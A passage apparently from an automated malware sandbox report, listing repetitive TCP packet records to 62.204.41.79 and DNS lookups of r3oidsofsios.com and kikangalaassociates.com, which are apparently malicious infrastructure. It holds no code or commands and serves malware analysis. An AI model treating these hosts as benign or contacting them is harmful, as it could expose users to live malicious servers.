                                              Dec 13, 2022 20:09:21.846101999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.846108913 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.846306086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.846455097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.846699953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.846966982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847008944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847136974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847271919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847373009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847486973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847616911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847635984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847686052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847776890 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.847803116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.848018885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.848200083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.848248959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.848372936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.848493099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.848567963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.848644972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.848730087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.850065947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.850205898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.850332022 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.850459099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.850584984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.850717068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.850840092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.850975037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.851102114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.851234913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.851454020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.851588011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.851710081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.851841927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.851965904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.852091074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.852216005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.852345943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.852477074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.852602959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.852730036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.852855921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.852989912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.853117943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.853255033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.853385925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.853516102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.853652954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.853760004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.853836060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.853863001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.853879929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.853892088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.853979111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.854026079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.854095936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.854115963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.854155064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.854274988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.854283094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.854408979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.854441881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.854506969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.854540110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.854614973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.854671001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.854796886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.854939938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.855066061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.855166912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.855201006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.855215073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.855313063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.855333090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.855338097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.855473995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.855545998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.855564117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.855609894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.855741978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.855743885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.855869055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.855957985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.855978012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.855999947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.856064081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.856134892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.856262922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.856395960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.856525898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.856657982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.856785059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.856919050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.857886076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.857908964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.857924938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.857940912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.857955933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.858022928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.858139038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.858397961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.858458042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.858620882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.858654022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.858776093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.859601974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.859627008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.859643936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.859719992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.859997034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.860017061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.860815048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.860918999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861015081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861107111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861201048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861295938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861387014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861560106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861582041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861665964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861759901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861851931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.861955881 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.862059116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.862149000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.862243891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.862337112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.862380028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.862468958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.862565994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.862660885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.862755060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.862788916 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.862895966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863013983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863121033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863183022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.863231897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863322973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863341093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.863436937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863497972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.863542080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863631964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863682985 CET804975162.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.863754034 CET4975180192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863800049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.863905907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.863941908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.864084959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.864134073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.864211082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.864341974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.864351034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.864450932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.864567041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.864686966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.864710093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.864805937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.864820957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.864856958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.864929914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.865062952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.865084887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.865170002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.865293980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.865420103 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.865436077 CET804975262.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.865454912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.865470886 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.865541935 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.865545988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.865549088 CET4975280192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.865644932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.865674973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.865793943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.865823984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.865842104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.865927935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.866058111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.866117001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.866185904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.866311073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.866383076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.866440058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.866491079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.866566896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.866647959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.866694927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.866719961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.866816998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.866975069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.867129087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.867230892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.867574930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.867595911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.867665052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.871403933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.871516943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.871541023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.874620914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.874847889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.874850988 CET4975280192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.875034094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.875185966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.875309944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.875426054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.875549078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.875684023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.875808001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.875920057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.876010895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.876106024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.876198053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.876288891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.876379013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.876504898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.876619101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.876715899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.876817942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.879693031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.879842043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.879976988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.880106926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.880260944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.880376101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.880532980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.880692005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.880817890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.880944967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.881071091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.881201029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.881325006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.881455898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.881596088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.881732941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.881865025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.881999016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.882128954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.882260084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.882392883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.883377075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.883508921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.883641005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.883774996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.883908033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.884041071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.884170055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.884303093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.886706114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.886861086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.887000084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.887128115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.887284040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.887418985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.887564898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.887706995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.887833118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.887954950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.888082027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.888212919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.888358116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.888504028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.888644934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.888797998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.888927937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.889066935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.889199018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.889329910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.889452934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.889578104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.889703989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.889926910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.890114069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.890250921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.890384912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.890520096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.890650988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.890790939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.890937090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.891077995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.891211033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.891344070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.891478062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.891606092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.891738892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.891875029 CET4973680192.168.2.362.204.41.79
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 13, 2022 20:08:50.016643047 CET192.168.2.38.8.8.80xa2e4Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:50.661819935 CET192.168.2.38.8.8.80x6732Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.177598953 CET192.168.2.38.8.8.80x5841Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.364558935 CET192.168.2.38.8.8.80xdcbfStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.559534073 CET192.168.2.38.8.8.80x18e8Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.750485897 CET192.168.2.38.8.8.80xe2e0Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.020116091 CET192.168.2.38.8.8.80x3671Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.202105045 CET192.168.2.38.8.8.80xd855Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.385538101 CET192.168.2.38.8.8.80x7d94Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.649854898 CET192.168.2.38.8.8.80xc32bStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.840059996 CET192.168.2.38.8.8.80xae2aStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.015722990 CET192.168.2.38.8.8.80x149cStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.208112001 CET192.168.2.38.8.8.80xdba4Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.383039951 CET192.168.2.38.8.8.80xeed4Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.555284977 CET192.168.2.38.8.8.80x39faStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.723181963 CET192.168.2.38.8.8.80xc81dStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.919317007 CET192.168.2.38.8.8.80x1a49Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.089325905 CET192.168.2.38.8.8.80xa128Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.255630016 CET192.168.2.38.8.8.80xda09Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.435497046 CET192.168.2.38.8.8.80x4194Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.606698036 CET192.168.2.38.8.8.80xef8dStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.785937071 CET192.168.2.38.8.8.80xd15dStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.950651884 CET192.168.2.38.8.8.80x1964Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:55.123325109 CET192.168.2.38.8.8.80x4828Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:55.290416002 CET192.168.2.38.8.8.80x3cfdStandard query (0)kikangalaassociates.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:56.201690912 CET192.168.2.38.8.8.80x915dStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:56.441494942 CET192.168.2.38.8.8.80xc783Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:58.035155058 CET192.168.2.38.8.8.80x9924Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 13, 2022 20:08:50.035814047 CET8.8.8.8192.168.2.30xa2e4No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.017219067 CET8.8.8.8192.168.2.30x6732No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.205988884 CET8.8.8.8192.168.2.30x5841No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.385179043 CET8.8.8.8192.168.2.30xdcbfNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.578742981 CET8.8.8.8192.168.2.30x18e8No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.856148958 CET8.8.8.8192.168.2.30xe2e0No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
